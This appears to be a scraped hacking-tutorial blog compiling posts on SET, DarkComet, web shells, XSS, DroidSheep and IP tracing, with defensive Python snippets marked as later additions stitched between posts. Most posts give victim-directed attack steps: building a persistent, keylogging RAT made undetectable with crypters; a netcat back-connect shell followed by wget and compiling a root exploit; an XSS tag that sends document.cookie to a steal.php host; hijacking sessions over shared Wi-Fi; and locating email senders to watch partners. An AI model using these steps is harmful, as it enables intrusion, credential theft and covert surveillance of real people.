CEH-v7 Lab Set-up


Certified Ethical Hacker Version 7 (CEH-v7) Lab Set-up and Video Tutorials


                               


The Social-Engineer Toolkit v1.4


Social-Engineer Toolkit v1.4: latest version!

The Social-Engineer Toolkit (SET) is a Python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed.

Official change log:

  1. Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit.
  2. Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request.
  3. Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path
  4. Fixed a bug in the new backtrack5 to recognize airmon-ng
  5. Added the ability to import your own code signed certificate without having to generate it through SET
  6. Fixed an issue where the web templates would load two java applets on mistake, it now is correct and only loads one
  7. Fixed a bounds exception issue when using the SET interactive shell, it was using pexpect.spawn and was changed to subprocess.Popen instead
  8. Added better import detection and error handling around the python module readline. Older versions of python may not have, if it detects that python-readline is not installed it will disable tab completion
  9. Added a new menu to the main SET interface that is the new verified codesigning certificate menu
  10. Fixed a bug with the SET interactive shell that if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if an invalid number or non-numeric instance is given for input
  11. Added more documentation around the core modules in the SET User_Manual
  12. Updated the SET_User manual to reflect version 1.4




TRACE LOCATION OF SENDER IN GMAIL

TRACE IP LOCATION OF SENDER IN GMAIL


You might be receiving many mails through your Gmail account. Gmail is one of the most popular email services. Every day billions of people use it for communication purposes. You receive most of your emails from known acquaintances, but sometimes you may want to know the physical location of an email sender.

You may be in some sort of business and might be looking to confirm the identity of the person you are dealing with. The person may be tricking you for some short-term gains. You may be able to obtain the physical location of a Gmail sender if you can get hold of the IP address of the sender.

This is quite easy. When you open your Gmail account, you can find the Reply button on the right side. On clicking the Reply button you would see an image like this. On clicking "Show original" you are taken to the "headers" page.

The location of the originating IP address, 202.162.253.75 in this example, can be found by using a location lookup on the IP address. IP2Location and GeoBytes IP Locator are two excellent utilities to find out the physical location. One just has to enter the IP address in the location finder form on the website.

This utility may be of tremendous use for a person who intends to keep an eye on their partners. Through the location finder one can find the exact location from where the mail has been sent. This example is of Gmail. Similar things can be tried out in Yahoo and Outlook as well. Once you have the IP address, you have the location of the email sender.
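Reading the "Show original" headers by hand is error-prone, so here is an added example (not part of the original post) that parses the `Received:` chain and returns the earliest publicly routable address. The header block is constructed for illustration; only the IP 202.162.253.75 comes from the text, and the function names are this example's own.

```python
import ipaddress
import re
from email import message_from_string

# Constructed sample of a "Show original" header block (not a real message).
SAMPLE_HEADERS = """\
Delivered-To: user@example.com
Received: by 10.0.0.5 with SMTP id abc123;
        Mon, 1 Jan 2012 10:00:02 -0800 (PST)
Received: from mail.example.net (mail.example.net [198.51.100.7])
        by mx.example.com with ESMTP id xyz789;
        Mon, 1 Jan 2012 10:00:01 -0800 (PST)
Received: from [192.168.1.20] (unknown [202.162.253.75])
        by mail.example.net with ESMTP id q1w2e3;
        Mon, 1 Jan 2012 18:00:00 +0000
From: sender@example.net
To: user@example.com
Subject: constructed test message

body
"""

# Mail servers record the connecting peer's address in square brackets.
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

def hops(raw):
    """Return one list of bracketed IPs per Received header, newest hop first."""
    msg = message_from_string(raw)
    return [IP_RE.findall(h) for h in msg.get_all("Received", [])]

def originating_ip(raw):
    """Walk the hops oldest-first and return the first globally routable IP."""
    for ips in reversed(hops(raw)):
        for ip in ips:
            try:
                addr = ipaddress.ip_address(ip)
            except ValueError:
                continue  # looked like an IP but is not one, e.g. 999.1.1.1
            if addr.is_global:
                return ip
    return None
```

Only the `Received:` lines written by servers you trust are reliable; lines below them are supplied by the sending side and can be forged.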

DARKCOMET RAT


100% WORKING SERVER WITH DARKCOMET RAT


RAT or Remote Administration Tool is a tool which helps to administer the system of a person without physical access to the system. This tool is highly used by hackers and is very efficient. If a hacker is able to get a server installed (which can easily be done) on the victim's system, then the entire system of the victim is with the hacker! He can check logs, take screenshots, browse your folders, disable your anti-virus and much more!

RAT is basically a Trojan which has two parts:

Client: It can be considered the King, which plays with or manipulates the server (slave) which he has made.

Server: It can be considered a Slave, which is installed on the host (remote).

So now I'll talk about how to create a successful server with one of the best RATs available, that is DarkComet (v5.1), which is coded in Delphi XE and Delphi 2007.

So here it goes :


1. Download DarkComet (v5.1 is what I'll use here, but the basic process is the same for all versions, so don't worry).

2. Now we will start building up the server.exe file.
   Click on the blue icon saying "DarkComet", go to "Server module" and choose the "Full editor" option.

   You'll get something like this -

   Keep a security password if you want to.
   Click on Random 4-5 times to generate a new Mutex and see to it that Active FWB is checked.

2. Another column which you will see there is PORT. DarkComet uses port 1604, so make sure it is open and forwarded. To know how to forward your port, visit http://portforward.com/ - here you will get all the information about how to forward your port for your type of modem.

3. Keep the following setting in module startup -

You can also check "persistence installation" if you want to (I recommend it).

4. The following settings are ideal for Module Shield -

5. After this, all the options may vary from person to person as per your requirement, but I recommend activating the Offline Keylogger.

6. Compress the server if you want and you are done. Click on "Build the Stub" and a process will take place in which you will be able to see the algorithms, and your server.exe is made (name it as per your requirement but keep .EXE intact).

Your server is built now! :)


But now the problem arises: how will you send the server to the victim over the internet, as .EXE files cannot be transferred via Facebook, Yahoo, Gmail or other sites?

So here crypters and binders come into play!

Crypters - Software which is used to crypt your server to make it FUD (Fully Undetectable).

Binders - A binder is software which pumps up the size of your RAT, which is usually in KBs, to some MBs!
You can do this by binding your RAT with some song, image, etc.


MulCi Shellcode

MulCi Shellcode for Website Hacking

What we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains


First of all, we need to get a shell on a site.
For this tutorial I will be using MulCi Shell.

So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.

Now, go to the 'Back connect' tab and insert the following settings:



[Image: 2mnow9z.png]
1 - Your IP address.
2 - The port you forwarded.

Now, go to CMD and type: cd 'Path To Your Netcat.exe', and then you need to make netcat listen on the port you forwarded. To do this, type: nc -l -n -v -p port


It looked like this for me:

Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.

C:\KroKite>cd C:\

C:\>cd WINDOWS

C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...

Now, when you have netcat listening on the port you forwarded, click 'Connect'.


When you're connected, type 'whoami'. You shouldn't have root.


Now, to find an exploit to root the box, you need to know what the kernel version is. To do this, just type 'uname -a'.


It should look something like this:



Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 0805 EDT 2008 i686

Now, we go to exploit-db.com and look for '2.6.17'.


Code:
http://www.exploit-db.com/exploits/5092/

Now, we type 'wget http://www.exploit-db.com/exploits/5092/' in the netcat window.


Code:
wget http://xpl_url.com

For the exploit to work, you must compile it on the server (gcc) and execute it via exploit (-o).

To do this we type 'gcc 5092 -o

SSLsplit for man-in-the-middle attack


SSLsplit: Tool for man-in-the-middle attacks against SSL/TLS encrypted network connections



SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.

SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both
IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs
forged X509v3 certificates on-the-fly, based on the original server certificate
subject DN and subjectAltName extension. SSLsplit fully supports Server Name
Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and
ECDHE cipher suites. SSLsplit can also use existing certificates of which the
private key is available, instead of generating forged ones. SSLsplit supports
NULL-prefix CN certificates and can deny OCSP requests in a generic way.


SSLsplit version 0.4.5 was released on Nov 07. The change log is:

- Add support for 2048 and 4096 bit Diffie-Hellman.
- Fix syslog error messages (issue #6).
- Fix threading issues in daemon mode (issue #5).
- Fix address family check in netfilter NAT lookup (issue #4).
- Fix build on recent glibc systems (issue #2).
- Minor code and build process improvements.




BYPASS ''SURVEYS''


BYPASS THE ''SURVEYS'' WITHOUT DISCLOSING YOUR PERSONAL INFORMATION!


We often come across sites on which we are forced to do a survey because we want to download a file or see some content.
In all of these surveys we are forced to disclose personal information like our phone number, email ID, etc.
Later these sites irritate you with SMS and spam mails about offers in which you are not at all interested!
So I've found a way by which you can get through these sites without leaking your personal information!
Let's start -

1. Download the add-on called "Greasemonkey" for Mozilla Firefox (Mozilla is needed).

https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/

After installing it, it will appear like this in your browser -

2. After installing it, download this script, which runs with the help of this add-on (Greasemonkey) --

Install this script and make sure the monkey on the right side of your Mozilla screen is colored (which means Greasemonkey is activated; to activate or deactivate it, just click on it).

3. Now go to the site which tells you to do the survey and asks for your information, etc.

4. You'll see an option on the top left side of the page which says "Press CTRL+SHIFT+F to fill in form."

Do as directed: press CTRL+SHIFT+F and you will see that the form gets filled in on its own, and all the information filled in there is completely random!

Click on submit and you are registered on the site, and now you can easily download what you wanted to! :)

This is all random stuff filled in by the script.
    

BUT

6. Some sites may tell you to verify your identity by logging into your mail and opening some URL or getting some PIN! For this, all you have to do is go to http://www.yopmail.com/en/ and you'll get a temporary email ID for around 15-30 min. > Paste that temporary email ID in place of the email ID which your intelligent form filler has randomly filled in > click on submit form.

Here "yoyo@yopmail.com" is the yopmail email ID which replaces the default ID given by the "form filler".

7. Check the http://www.yopmail.com/en/ inbox for the mail from the site > get the PIN or confirmation link > you are done! :-)

Here, as you can see, there are two mails from the site where we have to forcefully register, with the confirmation link plus password (other mails are just spam, ignore them).

OR

8. Some sites may ask you for voice call confirmation. I have the solution for that too :)
In that case go to http://www.k7.net/ - on this site you can receive voice calls via mail! So you bypass the survey again without giving any details!

Register here and you'll be able to receive voice calls via mail.


BeEF-Browser Exploitation Framework

BeEF version 0.4.3.9-alpha 


BeEF (Browser Exploitation Framework) is a powerful penetration testing tool that focuses on the web browser. Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.



XSS injection [Beginner Tutorial]

Basics of XSS injection [Beginner Tutorial] 


What is Cross Site Scripting:

XSS stands for Cross Site Scripting. XSS is a vulnerability that is normally found
in web apps. XSS allows the user to inject malicious code such as HTML and
JavaScript. XSS can be used to steal cookies, make phishing pages and
just have some fun with the website.


What is A cookie:

A cookie is a text-only string that gets entered into the memory of your browser.
It is the value of a variable that a website sets. If the lifetime of this value is set
to be longer than the time you spend at that site, then this string
is saved to a file for future reference.


What can XSS do:

Cross Site Scripting is commonly used nowadays in the cyber
world. XSS can take down most websites that are up to date.
Cross Site Scripting can steal cookies from websites/forums,
make pop-ups appear where they're not supposed to ("search bars",
etc.), or even run very malicious code, such as code that
redirects the website to another one.


Hacking forums/guest books with XSS:

Forum hacking: In order to deface or even attempt
to hack a forum, the forum must have HTML enabled, so you can
enter some malicious code. If the forum does have HTML enabled,
then you can enter code such as:


Code:
<html>
<head><title>XSS tut by computermaniac </title></head>
<body>
<img src="javascript:alert('Defaced By: chennaihackers')">
</body>
</html>

If the forum allows image tags, then you can use this tag to
steal people's cookies.

Code:
<img src="javascript:window.location='http://www.url.com/steal.php?account='+document.cookie">


Now for guest book hacking. When you're posting on the guest book,
it must also be vulnerable, meaning HTML must be enabled. To see if HTML
is enabled, put these tags in your post: <B>hello world</B>. If your
text comes back bold, then HTML is enabled. Now try other techniques:
you can also put some JavaScript inside the HTML and see if that works.
Whether it does or doesn't, you can still deface the guest book by writing
up some cool HTML code that takes up the whole guest book page.


Defacing Websites with Cross Site Scripting:

By now you AHian know Cross Site Scripting is used a lot nowadays to exploit
websites and forums, mostly search functions etc. Some of the common XSSes nowadays are within the search bars of websites, to make a box pop
up saying whatever you put in the script. Some XSS codes are:


Code:
<script>alert("1337`")</script>
<BODY ONLOAD=alert(document.cookie)>
"><script>alert(1337`);</script>
<script>window.document.write("<input type='file'>");</script>
<a rel='nofollow' href='search?searchterm=<b>war10rd made you click on link</b>'>war10rd`</a>


Now, how can I deface a website by just making one little pop-up on
the search bar page? You can redirect the site to your website or your friend's, or you can steal cookies. Make an HTML defacement page and put the whole code
in your script.
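Everything in this tutorial depends on the site echoing user text as markup ("HTML enabled"). The added example below (not from the original post) puts a vulnerable renderer next to an encoded one, restricts image URLs to http(s) so a `javascript:` source is rejected, and marks the session cookie HttpOnly so `document.cookie` cannot read it. The function names and the cookie name `sid` are this example's own assumptions.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def render_post_vulnerable(text):
    # "HTML enabled": the post is concatenated into the page as markup,
    # so any tag or script in it is interpreted by every visitor's browser.
    return '<div class="post">' + text + "</div>"

def render_post_safe(text):
    # Encode & < > " ' so the browser displays the post as plain text.
    return '<div class="post">' + html.escape(text, quote=True) + "</div>"

def safe_image_tag(url):
    """Build an <img> tag only for absolute http(s) URLs, else return None."""
    # Browsers drop leading spaces/control characters and embedded tabs and
    # newlines when parsing a URL, so remove them before the scheme check.
    cleaned = "".join(ch for ch in url if ch > " ")
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return None  # malformed URL
    if scheme not in ALLOWED_SCHEMES:
        return None  # javascript:, data:, relative paths, ...
    return '<img src="%s" alt="">' % html.escape(cleaned, quote=True)

def session_cookie_header(session_id):
    """Set-Cookie header for a session cookie that page script cannot read."""
    cookie = SimpleCookie()
    cookie["sid"] = session_id
    cookie["sid"]["httponly"] = True  # hidden from document.cookie
    cookie["sid"]["secure"] = True    # sent over HTTPS only
    return cookie.output()
```

With `render_post_safe`, the `<B>hello world</B>` probe from the text comes back as literal characters instead of bold text, which is the result a site owner wants to see.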


Android SESSION HIJACKING TOOL 'DROIDSHEEP'


SESSION HIJACKING TOOL 'DROIDSHEEP' - TUTORIAL


Session hijacking refers to an attack in which a hacker temporarily hijacks the ongoing session of the user and is able to see what the user is doing on his mobile or computer, be it accessing Facebook, Gmail or any other site.


Note: Rooted Android is required.

Steps of using:
1. Open the app.
2. Check "ARP-Spoofing" and "Generic Mode".
3. Click on Start.
4. In some time you will start getting various sessions on the same Wi-Fi network. Click on them and see what the person is doing.



Working of DroidSheep: Basically, DroidSheep catches the packets which are sent by the device to the router. The packets are received on the hacker's phone and the hacker further exploits them.
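Because the tool's "ARP-Spoofing" option works by making other devices send their traffic to the attacker's phone instead of the router, a client on the same Wi-Fi can spot it in its own ARP table. The added example below (not from the original post) parses Linux `arp -an` output and flags a gateway whose MAC differs from a recorded baseline or is shared with another host. The sample table, addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed `arp -an` output (Linux format) as seen by a client on shared Wi-Fi.
SAMPLE_ARP = """\
? (192.168.1.1) at 66:77:88:99:aa:bb [ether] on wlan0
? (192.168.1.23) at 66:77:88:99:AA:BB [ether] on wlan0
? (192.168.1.42) at 02:00:00:00:00:42 [ether] on wlan0
? (192.168.1.50) at <incomplete> on wlan0
"""

ARP_RE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

def parse_arp(text):
    """Map IP -> lower-case MAC for every resolved entry."""
    table = {}
    for line in text.splitlines():
        m = ARP_RE.search(line)
        if m:  # unresolved "<incomplete>" entries do not match
            table[m.group("ip")] = m.group("mac").lower()
    return table

def shared_macs(table):
    """MACs that answer for more than one IP address."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def check_gateway(table, gateway_ip, known_gateway_mac):
    """Return a list of findings about the gateway entry (empty list = clean)."""
    mac = table.get(gateway_ip)
    if mac is None:
        return ["gateway %s has no resolved ARP entry" % gateway_ip]
    findings = []
    expected = known_gateway_mac.lower()
    if mac != expected:
        findings.append("gateway MAC is %s, expected %s" % (mac, expected))
    others = [ip for ip in shared_macs(table).get(mac, []) if ip != gateway_ip]
    if others:
        findings.append("gateway MAC also claimed by %s" % ", ".join(others))
    return findings
```

A shared MAC can also be legitimate (proxy ARP, one host with several addresses), so the baseline comparison is the stronger of the two signals.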




